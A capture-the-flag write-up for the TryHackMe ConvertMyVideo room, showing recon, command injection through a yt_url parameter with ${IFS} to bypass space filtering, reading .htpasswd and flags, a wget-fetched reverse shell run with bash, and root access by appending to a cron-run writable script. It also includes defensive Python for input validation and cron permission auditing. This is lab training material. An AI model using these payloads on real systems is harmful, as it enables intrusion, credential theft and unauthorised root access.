TryHackMe — ConvertMyVideo
![](https://savassaygili.com/wp-content/uploads/2020/05/convert-mp3.png)
It's a very good lab, and you can practice lots of different topics at the same time.
# I scan with nmap
sudo nmap -sV 10.10.124.59
![](https://miro.medium.com/max/1199/1*Dnmcr5CgWayd95QqwT5CCw.png)
# I find the web port open and browse to it:
![](https://miro.medium.com/max/905/1*Wxfi_AZZJOmEuuH5Ix_yow.png)
# In parallel, I start dirsearch to find folders
sudo ./dirsearch.py -u http://10.10.124.59 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e js,php,html -x 403,404
![](https://miro.medium.com/max/1635/1*9oB_i0IKdR37SEsCjQhfzA.png)
# So we quickly find the answer to the first question: the /admin folder is our secret folder.
![](https://miro.medium.com/max/1159/1*cNGEN7-PEswxZu0e5iwUWQ.png)
# So I understand that it uses Basic Authentication and user credentials are needed; I started a password attack and, at the same time, started testing the web application.
In Burp I start manipulating requests:
![](https://miro.medium.com/max/1834/1*a7sr7tYUK_shzX4dx87koQ.png)
The first thing I investigate is the yt_url parameter. When I write
# |ls
I can execute my command, and at that point I think this is a very simple room to solve.
![](https://miro.medium.com/max/1749/1*eQWniFTDKhqvw3sDF-chHg.png)
# But after that I sent lots of Linux commands and got an error every time, so I triggered more errors and searched the internet for youtube-dl.
![](https://miro.medium.com/max/1690/1*WjZFwwfx4IokirrMWkk37Q.png)
# I find the source code of youtube_dl
# In my tests I got errors every time about invalid parameters and options, so when I looked at the GitHub page I saw the valid options.
![](https://miro.medium.com/max/1236/1*B10vZGso4Srryicsfdks0A.png)
# And I send the first option, --help, through Burp:
yt_url=--help
![](https://miro.medium.com/max/2231/1*Lc6E-EO59w0Lt61808axXg.png)
And bingo, the --help option worked for me; I could see all the help information in the response.
![](https://miro.medium.com/max/2665/1*AicySClVAWJM9aemRBa3mA.png)
![](https://miro.medium.com/max/1505/1*jyip58weHjVu_UFe3z3T8w.png)
# After that step I try to send a more powerful command that helps me reach my aim, and I spent about 1,5 on that.
# The main problem: simple commands like ls and id executed, but whenever I tried to execute ls -al I got syntax errors, so I focused on sending commands without spaces.
# Google is my best helper; I searched for:
“How to send a command with arguments without spaces?”
and found the right approach:
cat${IFS}file.txt
So by using ${IFS} I can send commands without spaces. Before doing this, I send all my requests to Burp Repeater to manipulate them more efficiently.
![](https://miro.medium.com/max/980/1*bT-kB96S-1mEmYEPAm9RZQ.png)
![](https://miro.medium.com/max/818/1*fHMuqji_lLq95kzilVpnCw.png)
# Please be careful with this part, because our parameter must be:
--version;ls${IFS}-al;
Note: the two hyphens (--) may be displayed as —. You can also use any of the options: --help, --execute, --version.
![](https://miro.medium.com/max/2429/1*q13Cwp2Ba5S_IUnWKsFbIA.png)
![](https://miro.medium.com/max/774/1*__DYh0fluOsZw_7VfvAwDQ.png)
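Seen from the defender's side, this works because the yt_url value reaches a shell command line, where ${IFS} expands to whitespace, so a check that only looks for spaces cannot stop it. The following is an added example, not code from the room or from this write-up: a Python handler that validates the URL and runs youtube-dl from an argument list with no shell. The host allow-list, the youtube-dl options chosen and the function names are assumptions.

```python
import re
import subprocess
from urllib.parse import urlsplit

# Assumed allow-list for this example; the room's real server code is not shown on the page.
ALLOWED_HOSTS = {"www.youtube.com", "youtube.com", "youtu.be"}
# Characters with meaning to a shell (defence in depth; no shell is used below).
SHELL_META = re.compile(r"[;|&$`<>\\\s'\"(){}\[\]]")


def space_only_filter(value: str) -> bool:
    """Hypothetical weak check: rejects literal spaces and nothing else."""
    return " " not in value


def is_safe_url(value: str) -> bool:
    """Accept only an https URL on an allow-listed host, free of shell syntax."""
    if value.startswith("-") or SHELL_META.search(value):
        return False
    parts = urlsplit(value)
    return parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS


def build_argv(url: str) -> list:
    """Argument vector for youtube-dl; '--' stops the URL being read as an option."""
    if not is_safe_url(url):
        raise ValueError("rejected yt_url value")
    return ["youtube-dl", "--extract-audio", "--audio-format", "mp3", "--", url]


def convert(url: str) -> subprocess.CompletedProcess:
    """Run the converter with an argv list, so no shell ever parses the URL."""
    return subprocess.run(build_argv(url), capture_output=True, timeout=300, check=False)


# Constructed inputs: the walkthrough's payload and an ordinary video URL.
PAYLOAD = "--version;ls${IFS}-al;"
GOOD = "https://www.youtube.com/watch?v=EXAMPLE0000"
```

The space-only check accepts PAYLOAD, while is_safe_url rejects it both for the leading hyphen and for the shell metacharacters.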
# So I can run any command with that method; now I try to access the /admin folder:
yt_url=--version;ls${IFS}/var/www/html/admin${IFS}-al;
![](https://miro.medium.com/max/934/1*j-9deC7ehQZRRORrxIGaOg.png)
![](https://miro.medium.com/max/1139/1*WbutVo441Z4iqFLLldsWJg.png)
# I found .htpasswd and flag.txt
To read flag.txt:
yt_url=--version;cat${IFS}/var/www/html/admin/flag.txt;
![](https://miro.medium.com/max/860/1*LkSvHae-BBgeJqrg5rBuNQ.png)
![](https://miro.medium.com/max/1411/1*fIkSpZMizdBtvx4qEP2d9Q.png)
And with the same method, when you look at .htpasswd:
yt_url=--version;cat${IFS}/var/www/html/admin/.htpasswd;
you can find the user:
![](https://miro.medium.com/max/1531/1*mAvWVSO3y9c17uopBH5lcA.png)
Now I need a shell to execute commands, so I prepare a bash-based reverse shell, shell.sh, on my Kali machine.
![](https://miro.medium.com/max/641/1*NkcVq2Mn8biBLyZgfual-w.png)
and on my Kali machine I start:
python -m SimpleHTTPServer 8090
and through Burp I try to download that file onto the vulnerable machine:
yt_url=--version;wget${IFS}http://10.9.32.166:8090/shell.sh;
![](https://miro.medium.com/max/899/1*khgPUkNdw-Ojmy75et248w.png)
--version;chmod${IFS}755${IFS}/var/www/html/shell.sh;
![](https://miro.medium.com/max/844/1*pNPDHX76vNlUubWCbfvyMg.png)
So I downloaded it and gave it execute permission; after that I start nc on my Kali machine to listen:
![](https://miro.medium.com/max/498/1*kJyh27ee00L2yqifsyTfMA.png)
When I start shell.sh through Burp, I have a shell 🙂
--version;bash${IFS}shell.sh;
![](https://miro.medium.com/max/1473/1*Sn1ISFZQIP0KcWPq9V6kbA.png)
# Once I had a console I tried every method and spent 2 hours; in the end I found only one way forward: there is a clean.sh script under the temp folder, a cron job executes it periodically, and I can edit it myself. (How did I know? Only CTF experience.)
So I try to execute this command:
![](https://miro.medium.com/max/1133/1*2ouIPf6_HrzQmPTd4ZTiTA.png)
echo 'cat /root/root.txt >root-oldum' >>clean.sh
And bingo, I have a root-oldum file in the same directory, which contains the root.txt flag.
![](https://miro.medium.com/max/705/1*sRbPV867GQcEuPipRiRgUA.png)
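A defender's check for the misconfiguration used in this last step, as an added example that is not part of the original write-up: it reports when a script run by a root cron job, or a directory above it, can be changed by a non-root user. The function name and parameters are assumptions, and the path in the usage comment is a placeholder because the post does not give the full path of clean.sh.

```python
import stat
from pathlib import Path


def audit_cron_script(script, trusted_uids=(0,), stop_at="/"):
    """Return findings that would let an untrusted user change what cron runs."""
    findings = []
    path = Path(script).resolve()
    stop = Path(stop_at).resolve()

    st = path.stat()
    if st.st_uid not in trusted_uids:
        findings.append(f"{path}: owned by uid {st.st_uid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: writable by group/other")

    # A writable parent directory lets the script be replaced outright,
    # unless the sticky bit restricts rename/delete to the file's owner.
    for parent in path.parents:
        pst = parent.stat()
        if pst.st_uid not in trusted_uids:
            findings.append(f"{parent}: directory owned by uid {pst.st_uid}")
        loose = pst.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
        if loose and not pst.st_mode & stat.S_ISVTX:
            findings.append(f"{parent}: directory writable by group/other")
        if parent == stop:
            break
    return findings


# Usage (placeholder path; substitute each script named in root's crontab):
#   for line in audit_cron_script("/path/to/clean.sh"):
#       print(line)
```

An empty result means the script and every directory checked are owned by a trusted uid and not writable by anyone else.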
Super CTF. Thank you, overjt.